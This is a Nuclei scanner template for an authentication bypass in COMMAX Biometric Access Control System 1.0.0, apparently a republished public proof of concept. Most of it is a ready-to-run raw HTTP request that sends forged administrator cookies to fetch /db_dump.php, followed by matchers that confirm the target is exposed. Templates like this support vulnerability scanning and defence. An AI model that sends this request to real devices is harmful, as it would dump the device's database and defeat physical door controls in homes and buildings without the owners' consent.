COMMAX Biometric Access Control System 1.0.0 suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
PoC代码[已公开]
id: commax-biometric-auth-bypass
info:
name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
author: gy741
severity: critical
description: |
COMMAX Biometric Access Control System 1.0.0 suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings.
reference:
- https://www.exploit-db.com/exploits/50206
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php
metadata:
max-request: 1
tags: commax,auth-bypass,edb,vuln
http:
- raw:
- |
GET /db_dump.php HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: {{BaseURL}}/user_add.php
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>::: COMMAX :::</title>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a00463044022044535b875f7f2e249942e03eb6afc56e7365efa0cf250e98dc2f43d5e6cb710e02200c1d3f536afffc75025bbcfd9c54930a4b7ca4e65c1d30f9298d44adf8c77fe8:922c64590222798bb761d5b6d8e72950